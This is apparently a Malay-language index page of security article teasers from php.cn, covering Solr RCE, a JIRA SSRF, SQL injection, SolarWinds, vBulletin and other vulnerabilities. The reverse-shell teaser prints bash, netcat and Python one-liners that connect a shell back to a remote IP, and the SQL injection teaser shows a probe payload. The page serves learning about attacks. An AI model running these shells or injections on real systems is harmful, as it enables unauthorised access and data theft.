Halaman 33-Keselamatan Pelajaran Program: Belajar Keselamatan Online-php.cn

Article Tags

Keselamatan

Rumah

Technical articles

Operasi dan penyelenggaraan

Keselamatan

Contoh analisis tentang kerentanan RCE suntikan templat halaju Apache Solr

0x01 Pengenalan Solr ialah pelayan aplikasi carian peringkat perusahaan bebas yang menyediakan antara muka API yang serupa dengan perkhidmatan Web. Pengguna boleh menyerahkan fail XML dalam format tertentu kepada pelayan enjin carian melalui permintaan http untuk menjana indeks mereka juga boleh membuat permintaan carian melalui operasi HttpGet dan mendapatkan hasil yang dikembalikan dalam format XML. Pengenalan Kerentanan 0x02 Komponen VelocityResponseWriter wujud dalam Solr Penyerang boleh membina permintaan khusus untuk mengubah suai konfigurasi yang berkaitan, supaya komponen VelocityResponseWriter membenarkan pemuatan templat yang ditentukan, yang seterusnya menyebabkan templat Velocity menyuntik kelemahan pelaksanaan arahan jauh. Penyerang mengeksploitasi ini

May 19, 2023 am 10:37 AM

Solr Velocity

Analisis contoh penggunaan kelemahan JIRA untuk mengakses rangkaian penghala Internet Protokol tidak terklasifikasi tentera AS

Berikut menerangkan cara pengarang mengambil bahagian dalam Jabatan Pertahanan (DoD) A.S. Menggodam projek ujian awam kerentanan Pentagon dan menggunakan kerentanan JIRA CVE-2017-9506 untuk membina permukaan serangan SSRF dan mencapai akses kepada Internet Bukan Sulit tentera A.S. Rangkaian Penghala Protokol (NIPRnet), dan Digabungkan dengan teknik kelemahan lain, satu siri maklumat sensitif sistem intranet DoD telah diperolehi. Disebabkan sifat sulit proses dan kandungan ujian, artikel ini hanya menyentuh perkara ini tanpa mendedahkan terlalu banyak butiran teknikal dan senario terperinci Ia hanya untuk pembelajaran dan perkongsian, dan saya harap pembaca akan bersabar dengan saya. JIRA ialah alat perisian pengesanan dan pengurusan yang sangat baik yang dibangunkan oleh Syarikat Atlassian di Australia Ia boleh menjejak dan mengurus pelbagai jenis isu.

May 18, 2023 pm 10:29 PM

jira

Apakah jenis suntikan SQL?

Kaedah serangan suntikan SQL Prakata boleh dibahagikan kepada suntikan eksplisit, suntikan ralat dan suntikan buta mengikut aplikasi memproses kandungan yang dikembalikan oleh pangkalan data. Penyerang suntikan eksplisit boleh terus mendapatkan kandungan yang mereka inginkan daripada kandungan antara muka semasa. Hasil yang dikembalikan oleh pertanyaan pangkalan data suntikan ralat tidak dipaparkan pada halaman, tetapi aplikasi mencetak maklumat ralat pangkalan data ke halaman, jadi penyerang boleh membina pernyataan ralat pangkalan data dan mendapatkan kandungan yang dikehendaki daripada maklumat ralat. Hasil pertanyaan pangkalan data suntikan buta tidak boleh diperoleh daripada halaman intuitif Penyerang memperoleh kandungan yang dikehendaki dengan menggunakan logik pangkalan data atau melambatkan pelaksanaan perpustakaan pangkalan data. Suntikan gabungan manual mysql suntikan?id=1'orderby4--

May 18, 2023 pm 10:05 PM

SQL

Apakah peluru lantunan semula?

1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

May 18, 2023 pm 10:01 PM

shell

Cara menggunakan rangka kerja APT baharu NSA DarkPulsar

Prakata Pada Mac 2017, ShadowBrokers mengeluarkan dokumen sulit yang mengejutkan dunia, termasuk dua rangka kerja: DanderSpritz dan FuzzBunch. DanderSpritz terdiri sepenuhnya daripada pemalam dan digunakan untuk mengumpulkan kecerdasan, mengeksploitasi kelemahan dan memanipulasi peranti yang diambil alih. Ia ditulis dalam Java dan menyediakan antara muka grafik yang serupa dengan panel pengurusan botnet dan panel kawalan yang serupa dengan alat Metasploit. Ia juga menggabungkan pintu belakang dan pemalam untuk peranti yang tidak dikawal oleh FuzzBunch. Gambaran Keseluruhan Antara Muka DanderSprit Fuzzbunch menyediakan rangka kerja untuk utiliti yang berbeza untuk berinteraksi dan bekerja bersama, termasuk pelbagai jenis pemalam.

May 18, 2023 pm 08:14 PM

nsaDarkPulsar

Cara menganalisis kerentanan pintasan kotak pasir Ghostscript SAFER

Prakata Ghostscript ialah perisian penterjemah untuk bahasa Adobe PostScript. Ia boleh menarik dalam bahasa PostScript dan menyokong penukaran antara PS dan PDF. Pada masa ini, ia dipasang secara lalai dalam kebanyakan pengedaran Linux dan telah dialihkan ke Unix, MacOS, Windows dan platform lain Ghostscript juga digunakan oleh program seperti ImagineMagic, PythonPIL dan pelbagai pembaca PDF. Perihalan kerentanan Pada 21 Ogos, penyelidik keselamatan Google Tavis Ormandy mendedahkan pelbagai kelemahan GhostScript Dengan membina skrip PostScript yang berniat jahat dalam imej, anda boleh memintas

May 18, 2023 pm 07:10 PM

ghostscriptSAFER

DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的，直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

May 18, 2023 pm 05:13 PM

DDCTFwriteup

Analisis contoh memintas akses terhad kepada sistem pengurusan dalaman Google

Pada suatu hari, semasa mencari kelemahan Google, saya menemui beberapa alamat IP perkhidmatan Google sendiri daripada kelemahan awam Pada mulanya, saya benar-benar tidak tahu apa yang boleh dilakukan oleh alamat IP ini. Saya menyemak alamat IP ini terlebih dahulu dan seterusnya mendapati bahawa ia mengandungi beberapa IP dalaman Google. Saya tiba-tiba teringat bahawa baru-baru ini, rakan saya KLSREERAM melaporkan kelemahan yang berkaitan dengan IP dalaman Google, dan rakan lain Vishnu melaporkan kelemahan yang menggunakan subdomain Google untuk mengakses panel kawalan. Pada masa ini, kedua-dua kelemahan telah diperbaiki oleh Google, dan alamat IP dalaman yang berkaitan dengan kedua-dua kelemahan ini tidak boleh diakses daripada Internet. Tetapi sekarang, dengan beberapa alamat IP dalaman Google di hadapan saya, saya perlu mencari jalan untuk melihat sama ada saya boleh

May 18, 2023 pm 03:19 PM

Google

Bagaimana untuk melaksanakan analisis kelemahan aplikasi Disk Pulse Enterprise Window

1. Pengenalan Kerentanan DiskPulseEnterprise ialah perisian yang memantau perubahan cakera Ia boleh menyambung dan mengurus perisian melalui port pengurusan 9120 atau tetingkap pengurusan web 80 untuk memantau perubahan cakera. Terdapat perpustakaan pautan dinamik libspp.dll dalam DiskPulse Enterprise, yang mengandungi beberapa fungsi yang bertanggungjawab untuk operasi HTTP Masalah berlaku dalam perpustakaan pautan dinamik ini Apabila memproses data pasca, tiada kawalan panjang yang ketat pada data pasca. mengakibatkan Apabila melaksanakan data yang diperoleh, ia menyalin data ke memori tidak sah, menyebabkan limpahan penimbal, mencetuskan pemprosesan tingkah laku abnormal SEH, dan akhirnya mengawal EIP untuk melaksanakan kod sewenang-wenangnya. Pautan muat turun perisian: h

May 18, 2023 pm 03:04 PM

windowDisk Pulse Eneterprise

Apakah sebab utama ranap sistem APP?

1. Apakah jenis senario yang mungkin menyebabkan masalah ranap? Baru-baru ini, saya telah memikirkan jenis masalah yang mungkin menyebabkan ranap - iaitu, mempunyai pemikiran yang tidak normal Contohnya: Saya menonton siri TV Amerika yang dipanggil "The Rookie " baru dua hari lepas. "Polis", ada adegan di mana protagonis John Nolan gagal memberhentikan kereta pelarian itu dengan kereta polis, menyebabkan pelarian itu melarikan diri. Apakah kaitan antara adegan ini dengan ujian itu? Pertama sekali, orang biasa akan mengelakkan perlanggaran dengan orang lain ketika memandu di jalan raya Ini seperti proses utama menguji fungsi, dan mereka tidak akan membuat input secara rawak tetapi dia akan melakukan apa sahaja untuk menangkap pelarian. Semua kaedah, ini adalah seperti pemikiran yang tidak normal semasa proses ujian, memikirkan bagaimana untuk mengendalikan fungsi untuk menjadikannya sukar untuk digunakan. Panduan 1. Operasi tidak normal Pelbagai operasi tidak normal

May 18, 2023 pm 01:55 PM

App

Apakah teknik biasa untuk pangkalan data MySQL?

1. Bagaimana untuk memilih jenis pelayan? Maksud setiap parameter dalam tetingkap konfigurasi pelayan MySQL adalah seperti berikut. [ServerConfigurationType] Pilihan ini digunakan untuk menetapkan jenis pelayan. Klik butang bawah di sebelah kanan pilihan ini untuk melihat 3 pilihan. Makna khusus bagi tiga pilihan adalah seperti berikut: Mesin Pembangunan: Pilihan ini mewakili stesen kerja desktop peribadi biasa. Andaikan terdapat berbilang aplikasi desktop yang berjalan pada mesin. Konfigurasikan pelayan MySQL untuk menggunakan sumber sistem yang minimum. ServerMachine (pelayan): Pilihan ini mewakili pelayan MySQL boleh dijalankan bersama-sama dengan aplikasi lain, seperti FTP, EMA

May 18, 2023 pm 01:29 PM

MySQL

Contoh Analisis Risiko Keselamatan Insiden Serangan APT Rantaian Bekalan SolarWinds

Latar Belakang Pada 13 Disember, syarikat keselamatan terkemuka A.S. FireEye (nama Cina: Huoyan) mengeluarkan laporan yang menyatakan bahawa ia telah menemui aktiviti pencerobohan global dan menamakan organisasi itu UNC2452. Organisasi APT menceroboh syarikat SolarWinds, menanam kod hasad dalam pakej kemas kini perisian komersial SolarWindsOrion dan mengedarkannya FireEye memanggilnya sebagai perisian hasad SUNBURST. Pintu belakang mengandungi keupayaan untuk memindahkan fail, melaksanakan fail, menganalisis sistem, but semula mesin dan melumpuhkan perkhidmatan sistem untuk tujuan pergerakan sisi dan kecurian data. SolarWindsOrionPlatform ialah platform pemantauan dan pengurusan infrastruktur yang berkuasa dan boleh skala untuk

May 18, 2023 pm 12:52 PM

aptsolarwinds

Contoh analisis kelemahan pelaksanaan kod jauh vBulletin 5.x

Pengenalan kepada komponen vBulletin vBulletin ialah peneraju global dalam perisian penerbitan forum dan komuniti. Keselamatannya, fungsi pengurusan yang berkuasa dan kepantasannya serta keupayaannya untuk berkhidmat kepada lebih 40,000 komuniti dalam talian amat digemari oleh pelanggan. Banyak forum besar telah memilih vBulletin sebagai komuniti mereka. Daripada senarai pelanggan yang dipaparkan di laman web rasmi vBulletin, kita dapat mengetahui bahawa syarikat pengeluaran permainan terkenal EA, platform permainan terkenal Steam, syarikat multinasional Jepun yang besar, Sony, dan Amerika Syarikat, vBulletin semuanya adalah pelanggannya yang cekap, stabil dan selamat. Di China Terdapat juga ramai pelanggan besar, seperti Hummingbird.com, 51 Group Buying, Ocean Tribe dan forum dalam talian lain dengan berpuluh ribu orang menggunakan vBull.

May 18, 2023 am 11:46 AM

vBulletin

Analisis contoh Google membetulkan kerentanan Chrome 0 hari di bawah serangan aktif

Google mengeluarkan kemas kini Chrome pada 25hb untuk membetulkan tiga kelemahan keselamatan, termasuk kerentanan 0 hari yang sedang dieksploitasi secara aktif. Butiran tentang serangan ini dan cara kerentanan dieksploitasi terhadap pengguna Chrome belum didedahkan kepada umum. Serangan itu ditemui pada 18 Februari oleh Clement Lecigne, ahli pasukan analisis ancaman Google. Kumpulan Analisis Ancaman Google ialah jabatan di Google yang menyiasat dan menjejaki kumpulan pelakon ancaman. Chrome versi 80.0.3987.122 membetulkan kerentanan 0 hari. Kemas kini tersedia untuk pengguna Windows, Mac dan Linux, tetapi pengguna ChromeOS, iOS dan Android

May 18, 2023 am 11:25 AM

GoogleChrome 0-day